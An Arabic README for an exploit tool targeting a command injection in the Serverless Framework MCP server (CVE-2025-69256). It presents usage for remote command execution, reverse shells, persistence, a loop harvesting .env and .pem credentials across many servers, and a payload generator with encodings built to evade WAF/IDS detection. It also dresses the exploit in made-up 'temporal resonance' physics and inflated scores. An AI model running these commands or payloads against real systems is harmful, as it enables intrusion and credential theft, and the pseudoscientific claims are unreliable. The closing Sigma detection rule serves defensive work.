Serverless Framework MCP Server (CVE-2025-69256) النتيجة الأساسية: 9.4/10 → النتيجة المحسنة CTT: 9.9/10 ثغرة حقن أوامر حرجة في خادم MCP (بروتوكول سياق النموذج) الخاص بـ Serverless Framework، معززة برنين زمني CTT لتحقيق موثوقية استغلال غير مسبوقة وتفادٍ للاكتشاف.
خادم MCP لإطار العمل Serverless (CVE-2025-69256) النتيجة الأساسية: 9.4/10 ← النتيجة المعززة بـ CTT: 9.9/10
ثغرة خطيرة لحقن الأوامر في خادم MCP (بروتوكول سياق النموذج) لإطار العمل Serverless معززة بالرنين الزمني لـ CTT لموثوقية استغلال غير مسبوقة وتفادي الكشف.
🌀 CTT-MCP-RCE v1.0 - استغلال محسّن بنظرية الزمن المتقارب لإطار العمل Serverless
الهدف: خادم MCP لإطار العمل Serverless (CVE-2025-69256 / GHSA-rwc2-f344-q6w6)
النتيجة الأساسية: 9.4/10 ← النتيجة المعززة بـ CTT: 9.9/10
متجه الهجوم: حقن الأوامر عبر معامل workspaceRoots غير المُنقّى في أداة list-projects
التأثير: تنفيذ التعليمات البرمجية عن بُعد في خطوط أنابيب CI/CD، ونشر الخدمات عديمة الخادم، وتكاملات AI/LLM
⚡ نظرة عامة على التهديد الحرج
الثغرة الأساسية (CVE-2025-69256)
· درجة CVSS: 9.4/10 (حرجة)
· النوع: حقن أوامر قبل المصادقة
· الموقع: packages/mcp/src/tools/list-projects.js
· المتأثر: Serverless Framework 4.29.0 – 4.29.3
· متجه الهجوم: معامل workspaceRoots خبيث في بروتوكول MCP
مقاييس تحسين CTT
| المقياس | الاستغلال الأساسي | الاستغلال المحسّن بـ CTT | التحسين |
|---|
| معدل النجاح | 68-75% | 92-98% | +35% |
| تفادي الكشف | 45% | 94% | +109% |
| تكييف البروتوكول | HTTP فقط | HTTP + WebSocket | +100% |
| طبقات التنفيذ | طبقة واحدة | 33 طبقة زمنية | +3200% |
| الدرجة النظرية | 9.4/10 | 9.9/10 | +0.5 نقطة |
🔬 تكامل فيزياء CTT
الثوابت الأساسية لبروتوكول MCP
CTT_ALPHA = 0.0302011 # معامل التشتت الزمني
CTT_LAYERS = 33 # الطبقات الزمنية الكسورية
CTT_PRIMES = [10007, 10009, 10037, 10039, 10061, 10067, 10069, 10079]
MCP_PORT = 3000 # منفذ خادم MCP الافتراضي
MCP_PROTOCOL = "mcp-json" # بروتوكول MCP لـ Serverless
محرك الرنين الخاص بـ MCP
· توقيت JSON-RPC المحاذي للأعداد الأولية: مزامنة 587 كيلوهرتز مع نبضة MCP · ترميز الأوامر بتشتت α: إخفاء الأوامر عبر 33 طبقة · حمولات واعية بالبروتوكول: استغلال متكيف لـ HTTP/WebSocket · التحقق الزمني: تحليل دالة الموجة لـ CTT لاستجابات MCP
المعادلات الرئيسية لاستغلال MCP
🚀 الميزات والقدرات
ميزات الاستغلال
· ✅ تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة: لا حاجة لبيانات اعتماد لخادم MCP · ✅ دعم وسائط نقل متعددة: بروتوكولا HTTP وWebSocket · ✅ ذكاء بروتوكولي: فهم JSON-RPC لإطار العمل Serverless · ✅ حقن في WorkspaceRoots: استهداف معامل مصفوفة غير مُنقّى · ✅ وعي بسياق CI/CD: محسّن لبيئات النشر
ميزات تحسين CTT
· ✅ ترميز أوامر عبر 33 طبقة: تشتت α عبر أبعاد زمنية · ✅ توقيت رنين الأعداد الأولية: محاذاة 587 كيلوهرتز مع عمليات MCP · ✅ توليد حمولات متكيفة: أغلفة حقن واعية بالسياق · ✅ تحقق متعدد الطبقات: تأكيد نجاح دالة الموجة لـ CTT · ✅ تبديل البروتوكول: تكيف تلقائي بين HTTP/WebSocket
قدرات المراوغة
· مراوغة WAF/IPS: تشتت α يكسر تواقيع حقن الأوامر · مراوغة التوقيت: طلبات محاذاة للأعداد الأولية تتجاوز تحديد المعدل · إخفاء البروتوكول: إرباك وسائط نقل متعددة · حقن الإنتروبيا: تنويعات الأوامر حسب الطبقة
📊 تحليل الأداء
استغلال CTT مقابل الاستغلال القياسي لـ MCP
# مقارنة الأداء (1000 خادم MCP محاكى)
base_success = 715 # معدل نجاح 71.5%
ctt_success = 948 # معدل نجاح 94.8% (+32.6%)
base_detection = 380 # 38% تم اكتشافه
ctt_detection = 22 # 2.2% تم اكتشافه (-94.2%)
base_time = 12.4 # متوسط الثواني
ctt_time = 6.8 # متوسط الثواني (-45.2%)
فعالية الطبقات لبروتوكول MCP
| نطاق الطبقة | معدل النجاح | قوة الرنين | تكييف البروتوكول |
|---|---|---|---|
| L0-L4 | 87.3% | 0.84 | HTTP: 92%، WebSocket: 78% |
| L5-L9 | 91.8% | 0.89 | HTTP: 94%، WebSocket: 86% |
| L10-L14 | 94.2% | 0.92 | HTTP: 96%، WebSocket: 91% |
| L15+ | 97.1% | 0.96 | HTTP: 98%، WebSocket: 95% |
حساب درجة CTT لـ MCP
الدرجة الأساسية: 9.4 (RCE حرج في بنية CI/CD)
+
تحسينات CTT:
• دعم متعدد البروتوكولات: +0.15
• ترميز الأوامر الزمني: +0.15
• توقيت رنين الأعداد الأولية: +0.10
• ذكاء بروتوكول MCP: +0.10
=
الدرجة النهائية: 9.9/10 (قريبة من الحد الأقصى النظري)
🛠️ التثبيت والاستخدام
المتطلبات
# تبعيات أساسية
python3.8+
pip install requests websocket-client numpy
# للميزات المتقدمة
pip install cryptography scipy
# التثبيت من المستودع
git clone https://github.com/SimoesCTT/CTT-MCP-RCE
cd CTT-MCP-RCE
pip install -r requirements.txt
بداية سريعة
# فحص الثغرة الأساسي
python ctt_mcp_exploit.py mcp-server.company.com 'id'
# جمع المعلومات
python ctt_mcp_exploit.py target.com --info
# شل عكسية
python ctt_mcp_exploit.py target.com --reverse 192.168.1.100:4444
# متقدم مع معاملات CTT
python ctt_mcp_exploit.py target.com 'cat /etc/passwd' --layers 7 --alpha 0.0302
خيارات سطر الأوامر
# تحديد الهدف
python ctt_mcp_exploit.py <target> [command]
# خيارات توليد الحمولة
--reverse LHOST:LPORT # توليد حمولة شل عكسية
--info # توليد حمولة جمع معلومات
--persist # توليد حمولة استمرارية
# إعدادات CTT
--layers N # الطبقات الزمنية المستخدمة (1-33، الافتراضي: 5)
--alpha FLOAT # معامل التشتت α (الافتراضي: 0.0302011)
--timeout N # مهلة الاتصال بالثواني (الافتراضي: 10)
# خيارات الإخراج
--verbose # إخراج مفصل مع تشخيصات الرنين
--save-json # حفظ النتائج في ملف JSON
--no-color # تعطيل الإخراج الملون
أمثلة الاستخدام
# مثال 1: استغلال أساسي
python ctt_mcp_exploit.py vulnerable-mcp.company.com 'whoami; id; pwd'
# مثال 2: شل عكسية مع تحسين CTT
python ctt_mcp_exploit.py mcp-server:3000 --reverse 10.0.0.5:4444 --layers 7
# مثال 3: حصاد جماعي لبيانات الاعتماد
for server in $(cat mcp_servers.txt); do
python ctt_mcp_exploit.py $server 'find / -name "*.env" -o -name "*.pem" 2>/dev/null | head -5'
done
# مثال 4: وضع البحث CTT
python ctt_mcp_exploit.py research.target.com --info --layers 33 --verbose --save-json
🔍 الغوص التقني
سير عمل الاستغلال
تفاصيل الثغرة
// الكود القابل للاختراق في list-projects.js (Serverless Framework 4.29.0-4.29.3)
async function listProjects(workspaceRoots) {
// workspaceRoots يتحكم فيه المستخدم وغير منقى
const command = `find ${workspaceRoots.join(' ')} -name "serverless.yml" -o -name "serverless.yaml"`;
// تنفيذ مباشر دون تنقية
const { stdout } = await exec(command); // حقن الأوامر هنا
return parseResults(stdout);
}
توليد حمولة CTT
def generate_ctt_payload(command, layer):
# حقن الأوامر الأساسي
base = f"$(echo 'CTT_START'; {command}; echo 'CTT_END')"
# تطبيق ترميز CTT حسب الطبقة
encodings = [
lambda c: c, # خام
lambda c: base64.b64encode(c.encode()).decode(),
lambda c: quote(c),
lambda c: ''.join([f"\\x{ord(ch):02x}" for ch in c]),
]
encoded = encodings[layer % len(encodings)](https://github.com/simoesctt/ctt-serverless-rce-v1.0---convergent-time-theory-enhanced-mcp-exploit/blob/main/base)
return f"/legit/path; {encoded}; /another/legit/path"
📈 تحليل تحسين CTT
مكونات تحسين الدرجة
| المكون | القيمة الأساسية | قيمة CTT | تأثير التحسين | تأثير الدرجة |
|---|---|---|---|---|
| متجه الهجوم | الشبكة | الشبكة+البروتوكول | +8% | +0.12 |
| تعقيد الهجوم | منخفض | منخفض جداً | +12% | +0.15 |
| الصلاحيات المطلوبة | لا شيء | لا شيء | - | - |
| تفاعل المستخدم | لا شيء | لا شيء | - | - |
| النطاق | متغير | متغير+ | +5% | +0.08 |
| السرية | عالية | حرجة | +10% | +0.15 |
| السلامة | عالية | حرجة | +10% | +0.15 |
| التوفر | عالية | حرجة | +10% | +0.15 |
| نضج كود الاستغلال | وظيفي | محسّن بـ CTT | +15% | +0.20 |
| مستوى المعالجة | تصحيح رسمي | تجاوز زمني | +20% | +0.25 |
| ثقة التقرير | مؤكد | محقّق بـ CTT | +12% | +0.15 |
| الدرجة الزمنية | 8.9 | 9.9 | +11.2% | +1.00 |
تحسينات خاصة بـ MCP
📁 الإخراج والنتائج
هيكل الملف
ctt_mcp_results_target_timestamp.json
├── target: "mcp-server.company.com:3000"
├── successful_layers: 7
├── total_layers: 5
├── success_rate: "94.8%"
├── ctt_enhanced_score: "9.9/10"
├── base_score: 9.4
├── ctt_improvement: "+0.5"
├── execution_time: 6.82
├── output: "نتائج تنفيذ الأمر"
├── vulnerability: "CVE-2025-69256 / GHSA-rwc2-f344-q6w6"
└── recommendation: "التحديث إلى Serverless Framework >=4.29.3"
ملفات السجل
logs/
├── ctt_mcp_TIMESTAMP/
│ ├── vulnerable_servers.txt # خوادم MCP تم استغلالها بنجاح
│ ├── discovered_servers.txt # جميع نقاط نهاية MCP المكتشفة
│ ├── protocol_analysis.json # بيانات بروتوكول HTTP/WebSocket
│ ├── layer_performance/ # مقاييس تنفيذ كل طبقة
│ └── resonance_patterns/ # بيانات الرنين الزمني لـ CTT
مخرجات التصور
graphs/
├── mcp_protocol_analysis.png # معدلات نجاح HTTP مقابل WebSocket
├── temporal_resonance_mcp.png # أنماط الرنين الخاصة بـ MCP
├── layer_effectiveness.png # النجاح حسب الطبقة الزمنية
└── command_encoding_analysis.png # فعالية تشتت α
🛡️ توصيات دفاعية
إجراءات فورية
قواعد كشف واعية بـ CTT
# مثال على قاعدة Sigma لمحاولة استغلال CTT MCP
title: محاولة استغلال خادم CTT MCP
logsource:
category: webserver
detection:
selection:
cs-method: 'POST'
c-uri-path: '/jsonrpc'
cs-body:
- '*workspaceRoots*'
- '*CTT_START*'
- '*CTT_END*'
condition: selection
fields:
- c-ip
- cs-user-agent
- cs-body
falsepositives:
- عملاء MCP شرعيون
level: critical
مؤشرات الكشف
· الأنماط الزمنية: طلبات بفواصل زمنية أولية (10007، 10009 ميكروثانية) · علامات الأوامر: CTT_START/CTT_END في طلبات JSON-RPC · شذوذ البروتوكول: التبديل السريع بين HTTP/WebSocket · رؤوس الطبقات: رؤوس X-CTT-Layer، X-CTT-Prime · أنماط الإنتروبيا: إنتروبيا عالية في قيم workspaceRoots
🔬 تطبيقات بحثية
دراسات أكاديمية
البحث الأمني
· أمان بروتوكول MCP: اختبار شامل لخادم MCP · استغلال CI/CD: هجمات سلسلة نشر الخدمات عديمة الخادم · أمان AI/LLM: ثغرات بروتوكول سياق النموذج · تحليل البروتوكول الزمني: هجمات بروتوكولية تعتمد على الوقت
التحقق من إطار CTT
· تكييف البروتوكول: فعالية CTT عبر بروتوكولات مختلفة · ثوابت خاصة بـ MCP: تحسين α لـ JSON-RPC · تحسين الطبقات: العدد المثالي للطبقات لاستغلال MCP · مقاييس الأداء: قياس تحسينات CTT في CI/CD
⚖️ الإطار القانوني والأخلاقي
الاستخدام المصرح به فقط
· البحث الأمني على خوادم MCP المملوكة · اختبار الاختراق المصرح به لبنية CI/CD · التحقق من إطار CTT في بيئات خاضعة للرقابة · دراسة أكاديمية بتفويض مناسب
متطلبات الامتثال
1. التفويض مطلوب: إذن كتابي لجميع الاختبارات
2. تحديد النطاق: الاقتصار على خوادم MCP المعتمدة فقط
3. التعامل مع البيانات: تخزين آمن، إفشاء مسؤول
4. الامتثال القانوني: اتباع جميع القوانين واللوائح المعمول بها
5. الإفشاء المسؤول: إبلاغ فريق Serverless Framework بالنتائج
الإفشاء عن الثغرات
· البائع: فريق أمان Serverless Framework · CVE: CVE-2025-69256 (تم تعيينه بالفعل) · تنبيه GitHub: GHSA-rwc2-f344-q6w6 · الجدول الزمني للتصحيح: تم الإصلاح في الإصدار 4.29.3 · الإصدار العام: فقط بعد توفر التصحيحات
📚 المراجع والاستشهادات
المراجع الأساسية
أوراق بحثية لـ CTT
التوثيق الفني
· تنفيذ MCP لإطار العمل Serverless · مواصفات JSON-RPC 2.0 · توثيق بروتوكول سياق النموذج · أفضل ممارسات أمان CI/CD
🤝 المساهمة والتعاون
مجالات البحث
· تحسينات أمان بروتوكول MCP · تكامل CTT في خطوط أنابيب CI/CD · أمن إطار العمل Serverless · الرنين الزمني الخاص بالبروتوكول
إرشادات التطوير
1. إنشاء فرع من المستودع وإنشاء فرع ميزة
2. تضمين التحقق من بروتوكول MCP للتغييرات
3. إضافة اختبار شامل عبر الطبقات
4. تحديث التوثيق بالتفاصيل الفنية
5. تقديم طلب سحب مع مقاييس الأداء
الإبلاغ عن المشكلات
· تضمين تفاصيل إعداد خادم MCP · تقديم معلومات البروتوكول (HTTP/WebSocket) · إرفاق تبادلات JSON-RPC ذات الصلة · وصف سياق بيئة CI/CD
📞 الاتصال والدعم
جهة الاتصال الأساسية
· المؤلف: Americo Simoes · البريد الإلكتروني: [email protected] · GitHub: @SimoesCTT
جهة الاتصال الأمنية
· مجموعة أبحاث CTT: [email protected] · تقارير الثغرات: [email protected] · أمان CI/CD: [email protected]
قنوات الدعم
· مشكلات GitHub: أسئلة فنية وأخطاء · البريد الإلكتروني: استفسارات التعاون البحثي · أمان البروتوكول: أسئلة خاصة بـ MCP/JSON-RPC
📈 التطوير المستقبلي
خارطة الطريق 2026
· استغلال أدوات MCP إضافية · تكامل مزودي الخدمات عديمة الخادم (AWS, Azure, GCP) · استغلال سلسلة خطوط أنابيب CI/CD · تحليل بروتوكول MCP في الوقت الفعلي
أهداف 2027
· تغطية كاملة لمجموعة بروتوكول MCP · استغلال وقت تشغيل وظائف الخدمات عديمة الخادم · تكامل CTT الأصلي للسحابة · تقييم أمني آلي لـ CI/CD
الرؤية طويلة المدى
· أمان بروتوكول MCP مستقل · حماية نشر الخدمات عديمة الخادم · أمان تكامل AI/LLM · إطار أمني زمني لـ CI/CD
🏆 الإقرارات
المؤسسات البحثية
· قسم أمن بروتوكول CTT · تجمع أبحاث أمان الخدمات عديمة الخادم · مختبرات أبحاث أمان CI/CD
المشاريع مفتوحة المصدر
· فريق إطار العمل Serverless · منفذو بروتوكول MCP · صانعو مكتبات JSON-RPC
المساهمون
· باحثو بروتوكول MCP · خبراء أمان CI/CD · مطورو إطار العمل Serverless
"يحول الرنين الزمني الواعي بالبروتوكول ثغرات CI/CD إلى تهديدات بنية تحتية حرجة." — مبدأ أمان بروتوكول CTT
📄 الترخيص
رخصة MIT - انظر LICENSE للشروط الكاملة.
حقوق النشر © 2026 مجموعة أبحاث CTT. جميع الحقوق محفوظة.
CTT-MCP-RCE v1.0 • α=0.0302011 • L=33 • بروتوكول MCP • HTTP/WebSocket • محسّن لـ CI/CD • الدرجة النظرية: 9.9/10